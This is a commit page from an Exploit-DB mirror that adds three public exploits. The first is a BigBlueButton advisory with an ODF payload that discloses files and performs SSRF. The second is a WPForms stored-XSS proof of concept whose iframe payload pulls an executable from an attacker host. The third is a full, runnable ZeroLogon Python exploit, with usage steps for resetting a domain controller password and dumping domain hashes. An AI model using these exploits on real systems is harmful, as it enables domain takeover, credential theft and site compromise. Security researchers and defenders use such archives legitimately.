bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-11-19

Browse source 
3 changes to exploits/shellcodes

ZeroLogon - Netlogon Elevation of Privilege
Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)
BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
This commit is contained in:
Offensive Security 2020-11-19 05:02:00 +00:00
parent 66d1f19fa5
commit e57ba82919
4 changed files with 559 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

237
exploits/multiple/webapps/49070.txt Normal file
View file

@ -0,0 +1,237 @@
# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
# Date: 2020-09-11
# Exploit Author: RedTeam Pentesting GmbH
# Vendor Homepage: https://bigbluebutton.org/
# Version: BigBlueButton 2.2.25
RedTeam Pentesting discovered a vulnerability in the BigBlueButton web
conferencing system which allows participants of a conference with
permissions to upload presentations to read arbitrary files from the
file system and perform server-side requests. This leads to
administrative access to the BigBlueButton instance.
Details
=======
Product: BigBlueButton
Affected Versions: 2.2.25, potentially earlier versions as well
Fixed Versions: 2.2.27
Vulnerability Type: Arbitrary File Disclosure and
Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://bigbluebutton.org/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005
Advisory Status: published
CVE: CVE-2020-25820
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820
Introduction
============
"BigBlueButton is a web conferencing system designed for online
learning."
(from the vendor's homepage)
More Details
============
BigBlueButton is a web conferencing system that allows participants with
the appropriate privileges to upload files in various formats to be used
as presentation slides. Among other formats, BigBlueButton accepts
LibreOffice documents[1]. LibreOffice documents use the XML-based Open
Document Format for Office Applications (ODF)[2]. For technical
purposes, uploaded files are converted to PDF format with LibreOffice
and afterwards to SVG for displaying[6].
The ODF file format supports using the XML Linking Language (XLink) to
create links between documents[3]. When local files are referenced using
XLinks, the contents of the respective files are included in the
generated PDF file when BigBlueButton converts ODF documents with
LibreOffice. This leads to an arbitrary file disclosure vulnerability,
allowing malicious participants of conferences to extract files from the
BigBlueButton server's file system.
LibreOffice also embeds XLinks to remote locations when a document is
converted, which allows to perform server-side requests.
Proof of Concept
================
Start from an empty ODF Text Document and extract the content:
$ mkdir tmp-doc && cd tmp-doc
$ unzip ../empty.odt
Archive: empty.odt
extracting: mimetype
creating: Configurations2/accelerator/
creating: Configurations2/images/Bitmaps/
creating: Configurations2/toolpanel/
creating: Configurations2/progressbar/
creating: Configurations2/statusbar/
creating: Configurations2/toolbar/
creating: Configurations2/floater/
creating: Configurations2/popupmenu/
creating: Configurations2/menubar/
inflating: manifest.rdf
inflating: meta.xml
inflating: settings.xml
extracting: Thumbnails/thumbnail.png
inflating: styles.xml
inflating: content.xml
inflating: META-INF/manifest.xml
Replace the <office:body> element in the file content.xml with the
following:
<office:body>
<office:text>
<text:section text:name="string">
<text:section-source
xlink:href="file:///etc/passwd"
xlink:type="simple"
xlink:show="embed"
xlink:actuate="onLoad"/>
</text:section>
</office:text>
</office:body>
The text document now includes a section that references the external
file /etc/passwd. Create an new ODF Text Document with the modified
content:
$ zip -r ../modified.odt *
The document can now be uploaded as a presentation. After the
conversion, the presentation shows the contents of the file
/etc/passwd from the system running the BigBlueButton conferencing
software. To perform server-side requests, substitute the xlink:href
attribute's value with a remote URL such as http://example.com:
<office:body>
<office:text>
<text:section text:name="string">
<text:section-source
xlink:href="http://example.com"
xlink:type="simple"
xlink:show="embed"
xlink:actuate="onLoad"/>
</text:section>
</office:text>
</office:body>
When converting a document with this content, LibreOffice will fetch the
website's content and embed it into the generated PDF file.
Workaround
==========
To work around this issue, the conversion feature should be disabled if
it is not used. Otherwise, permission to upload presentations should
only be given to trusted users. Additionally, the allowed file types for
upload can be restricted to just PDF files.
Fix
===
Update to fixed version 2.2.27. Change API key after update.
Security Risk
=============
As shown, the presentation conversion feature of BigBlueButton can be
used to disclose arbitrary local files. Through the file disclosure,
attackers can gain access to the credentials of the BigBlueButton
instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties,
/usr/share/bbb-apps-akka/conf/application.conf), which allows for
administrative access to BigBlueButton through its API (see [5]),
including all conferences.
Additionally, it is possible to perform server-side requests. Note that
this vulnerability is different from CVE-2018-10583 [4], because the
risk is not the disclosure of credentials sent while fetching remote
resources, but the ability to access resources that are in the same
network segment as the BigBlueButton instance, which is possibly not
accessible from the Internet.
To exploit this vulnerability, attackers need to have access to a
conference with the ability to upload presentations. While successful
exploitation of this vulnerability would pose severe consequences for
the affected BigBlueButton instance, it is only rated to pose a medium
risk due to the requirement of having presentator access.
Timeline
========
2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication,
Vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability,
mentioned similar bugreport
2020-09-25 Requested information whether "similar burgreport"
uses the same vulnerability - no answer
2020-10-13 Again requested information whether "similar burgreport"
uses the same vulnerability, whether release shedule is
known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released
References
==========
[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations
[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

44
exploits/php/webapps/49069.txt Normal file
View file

@ -0,0 +1,44 @@
#Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)
#Exploit Author : ZwX
#Exploit Date : 2020-10-23
#Vendor Homepage : https://wpforms.com/
#Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip
[+] Description Vulnerability:
==============================
A Cross Site Scripting vulnerability is located in the Wordpress plugin [WPForms] which affects version 1.6.3.1 and other versions lower.
To exploit the vulnerability it is necessary to be identified, the attacker could hide JavaScript code without the knowledge of the owner of the site.
[+] Proof Of Concept:
=====================
# HTML Code #
<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><script>alert(1)</script></textarea>
<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><iframe src="https://Attacker.com/putty.exe" style="width:0;height:0;border:0; border:none;/></textarea>
# Methode POST #
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=wpforms-builder&view=fields&form_id=990
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 7081
Origin: http://localhost
Connection: close
action=wpforms_save_form&data=[{"name":"id","value":"990"},{"name":"field_id","value":"5"},{"name":"fields[0][id]","value":"0"},{"name":"fields[0][type]","value":"name"},{"name":"fields[0][label]","value":"Nom"},{"name":"fields[0][format]","value":"first-last"},{"name":"fields[0][description]","value":"<script>alert(1)</script>"},{"name":"fields[0][required]","value":"1"},{"name":"fields[0][size]","value":"medium"},{"name":"fields[0][simple_placeholder]","value":""},{"name":"fields[0][simple_default]","value":""},{"name":"fields[0][first_placeholder]","value":""},{"name":"fields[0][first_default]","value":""},{"name":"fields[0][middle_placeholder]","value":""},{"name":"fields[0][middle_default]","value":""},{"name":"fields[0][last_placeholder]","value":""},{"name":"fields[0][last_default]","value":""},{"name":"fields[0][css]","value":""},{"name":"fields[1][id]","value":"1"},{"name":"fields[1][type]","value":"email"},{"name":"fields[1][label]","value":"E-mail"},{"name":"fields[1][description]","value":""},{"name":"fields[1][required]","value":"1"},{"name":"fields[1][size]","value":"medium"},{"name":"fields[1][placeholder]","value":""},{"name":"fields[1][confirmation_placeholder]","value":""},{"name":"fields[1][default_value]","value":""},{"name":"fields[1][css]","value":""},{"name":"fields[1][filter_type]","value":""},{"name":"fields[1][allowlist]","value":""},{"name":"fields[1][denylist]","value":""},{"name":"fields[2][id]","value":"2"},{"name":"fields[2][type]","value":"textarea"},{"name":"fields[2][label]","value":"Commentaire ou message"},{"name":"fields[2][description]","value":""},{"name":"fields[2][required]","value":"1"},{"name":"fields[2][size]","value":"medium"},{"name":"fields[2][placeholder]","value":""},{"name":"fields[2][limit_count]","value":"1"},{"name":"fields[2][limit_mode]","value":"characters"},{"name":"fields[2][default_value]","value":""},{"name":"fields[2][css]","value":""},{"name":"fields[3][id]","value":"3"},{"name":"fields[3][type]","value":"textarea"},{"name":"fields[3][label]","value":"Paragraphe"},{"name":"fields[3][description]","value":""},{"name":"fields[3][size]","value":"medium"},{"name":"fields[3][placeholder]","value":""},{"name":"fields[3][limit_count]","value":"1"},{"name":"fields[3][limit_mode]","value":"characters"},{"name":"fields[3][default_value]","value":""},{"name":"fields[3][css]","value":""},{"name":"fields[4][id]","value":"4"},{"name":"fields[4][type]","value":"textarea"},{"name":"fields[4][label]","value":"Paragraphe"},{"name":"fields[4][description]","value":""},{"name":"fields[4][size]","value":"medium"},{"name":"fields[4][placeholder]","value":""},{"name":"fields[4][limit_count]","value":"1"},{"name":"fields[4][limit_mode]","value":"characters"},{"name":"fields[4][default_value]","value":""},{"name":"fields[4][css]","value":""},{"name":"settings[form_title]","value":"Formulaire de contact simple"},{"name":"settings[form_desc]","value":""},{"name":"settings[form_class]","value":""},{"name":"settings[submit_text]","value":"Envoyer"},{"name":"settings[submit_text_processing]","value":"Envoi..."},{"name":"settings[submit_class]","value":""},{"name":"settings[antispam]","value":"1"},{"name":"settings[notification_enable]","value":"1"},{"name":"settings[notifications][1][email]","value":"{admin_email}"},{"name":"settings[notifications][1][subject]","value":"Nouvelle entrée : Formulaire de contact simple"},{"name":"settings[notifications][1][sender_name]","value":"Le Blog de ZwX"},{"name":"settings[notifications][1][sender_address]","value":"{admin_email}"},{"name":"settings[notifications][1][replyto]","value":"{field_id=\"1\"}"},{"name":"settings[notifications][1][message]","value":"{all_fields}"},{"name":"settings[confirmations][1][type]","value":"message"},{"name":"settings[confirmations][1][message]","value":"<p>Merci de nous avoir contacté ! Nous vous contacterons rapidement.</p>"},{"name":"settings[confirmations][1][message_scroll]","value":"1"},{"name":"settings[confirmations][1][page]","value":"262"},{"name":"settings[confirmations][1][redirect]","value":""}]&id=990&nonce=ec15a26a5a
# URL Proof Of Concept #
http://localhost/?wpforms_form_preview=990

275
exploits/windows/remote/49071.py Executable file
View file

@ -0,0 +1,275 @@
# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
# Date: 2020-10-04
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
# Tested on: Microsoft Windows Server 2016 Standard x64
# CVE : CVE-2020-1472
# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
# Sources: https://www.secura.com/pathtoimg.php?id=2055
# Requirements: python3 and impacket 0.9.21+ (tested using this version)
#!/usr/bin/env python3
import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
from binascii import hexlify, unhexlify
from subprocess import check_call
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket import crypto, version
from impacket.examples import logger
from Cryptodome.Cipher import AES
from struct import pack, unpack
from impacket.dcerpc.v5.rpcrt import DCERPCException
class Exploit:
def __init__(
self,
name='',
address='',
attempts=2000,
password=''
):
name = name.rstrip('$')
self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\
.ServerSecureChannel
self.authenticator = self.getAuthenticator(stamp=0)
self.clearNewPasswordBlob = b'\x00' * 516
self.primaryName = ('\\\\%s' % name) + '\x00'
self.accountName = ('%s$' % name) + '\x00'
self.computerName = name + '\x00'
self.clientCredential = b'\x00' * 8
self.clientChallenge = b'\x00' * 8
self.negotiateFlags = 0x212fffff
self.address = address
self.max = attempts
self.dce = None
self.sessionKey = None
self.clientStoredCredential = None
self.password = password
def encodePassword(self, password):
if isinstance(password, str):
password = password.encode('utf-8')
return b'\x00' * (512 - len(password))\
+ password \
+ pack('<L', len(password))
def getAuthenticator(self, creds=b'\x00' * 8, stamp=10):
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = creds
authenticator['Timestamp'] = stamp
return authenticator
def serverReqChallenge(self):
try:
binding = epm.hept_map(
self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'
)
self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
self.dce.connect()
self.dce.bind(nrpc.MSRPC_UUID_NRPC)
return nrpc.hNetrServerReqChallenge(
self.dce,
self.primaryName,
self.computerName,
self.clientChallenge
)
except BaseException as ex:
self.logError(ex)
def serverAuthenticate(self):
try:
auth = nrpc.hNetrServerAuthenticate3(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.clientCredential,
self.negotiateFlags
)
assert auth['ErrorCode'] == 0
self.logInfo('successfully authenticated')
return True
except nrpc.DCERPCSessionError as ex:
self.dce = None
if ex.get_error_code() == 0xc0000022:
return None
else:
self.logFail(ex.get_error_code())
except BaseException as ex:
self.dce = None
self.logFail(ex)
self.dce = None
def serverPasswordSet(self):
try:
return nrpc.hNetrServerPasswordSet2(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.authenticator,
self.clearNewPasswordBlob
)
except BaseException as ex:
self.logError(ex)
def authenticate(self):
self.logInfo(
'checking target, attempting to authenticate %d max
attempts' % self.max
)
for attempt in range(0, self.max):
self.logInfo('attempt %d' % attempt)
self.serverReqChallenge()
self.serverAuthenticate()
if self.dce is not None:
break
if self.dce:
return True
else:
self.logError('failed to authenticate')
def exploit(self):
self.logInfo('attempting password reset')
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully reset password')
else:
self.logError('failed to reset password')
return self
def ComputeNetlogonCredentialAES(self, challenge):
return nrpc.ComputeNetlogonCredentialAES(
challenge,
self.sessionKey
)
def logInfo(self, message):
sys.stdout.write("[+] %s\n" % str(message))
return self
def logError(self, message):
sys.stderr.write("[-] error %s\n" % str(message))
def logFail(self, message):
sys.stderr.write("[!] failure %s\n" % str(message))
sys.exit(2)
def restore(self):
self.logInfo('attempting to restore password')
self.clientChallenge = b'12345678'
try:
self.primaryName = NULL
challenge = self.serverReqChallenge()
self.sessionKey = nrpc.ComputeSessionKeyAES(
'', self.clientChallenge, challenge['ServerChallenge']
)
self.clientCredential = self.ComputeNetlogonCredentialAES(
self.clientChallenge
)
try:
self.serverAuthenticate()
except Exception as e:
if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
raise
self.logInfo('restoring password')
self.clientStoredCredential = pack('<Q', unpack('<Q',
self.clientCredential)[0] + 10)
self.authenticator = self.getAuthenticator(
creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
)
self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
self.encodePassword(self.password)
)
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully restored password')
else:
self.logError('failed to restore password')
except Exception as ex:
self.logError(ex)
return self
if __name__ == '__main__':
info = """
NOTE - Exploitation will break the DC until restored, recommended guidelines:
1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>
2. Exploit the DC - this will break the DC until restored:
cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>
3. Dump the DC - for the DA hashes, this will not contain the
machine hex-pass:
secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>
4. Dump the DC again - use the DA hash to get the machines hex-pass:
secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>
5. Restore target - this fixes the DC:
cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>
-hex <HEXPASS>
"""
parser = argparse.ArgumentParser(
description='CVE-2020-1472 ZeroLogon Exploit - Netlogon
Elevation of Privilege',
add_help=True
)
try:
parser.add_argument('-do', default='check', action='store',
help='What to do (default check):
[check|restore|exploit]')
parser.add_argument('-target', action='store',
help='NETBIOS name of target DC (not the FQDN)')
parser.add_argument('-ip', action='store',
help='IP address of target DC')
parser.add_argument('-password', default='', action='store',
help='The plaintext password to use to
reset the DC')
parser.add_argument('-hex', default='', action='store',
help='The hex password to use to restore
the DC (recommended)')
parser.add_argument('-max', default=2000, action='store',
help='Max attempts to authenticate with
the DC (usually ~300 or less)')
if len(sys.argv) < 3:
parser.print_help()
print(info)
sys.exit(1)
options = parser.parse_args()
if options.do.lower() == 'check':
Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
).authenticate()
elif options.do.lower() == 'exploit':
exp = Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
)
if exp.authenticate():
exp.exploit()
elif options.do.lower() == 'restore':
if options.hex != '' and options.password == '':
options.password = unhexlify(options.hex)
if options.password != '':
exp = Exploit(
name=options.target,
address=options.ip,
password=options.password
).restore()
else:
parser.print_help()
except Exception as error:
sys.stderr.write('[-] error in main %s\n' % str(error))

3
files_exploits.csv
View file

@ -18298,6 +18298,7 @@ id,file,description,date,author,type,platform,port
48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux, 48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux,
49067,exploits/multiple/remote/49067.py,"Aerospike Database 5.1.0.3 - OS Command Execution",2020-11-17,"Matt S",remote,multiple, 49067,exploits/multiple/remote/49067.py,"Aerospike Database 5.1.0.3 - OS Command Execution",2020-11-17,"Matt S",remote,multiple,
49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple, 49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple,
49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -43296,3 +43297,5 @@ id,file,description,date,author,type,platform,port
48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php, 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php, 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php, 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php,
49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,

Can't render this file because it is too large.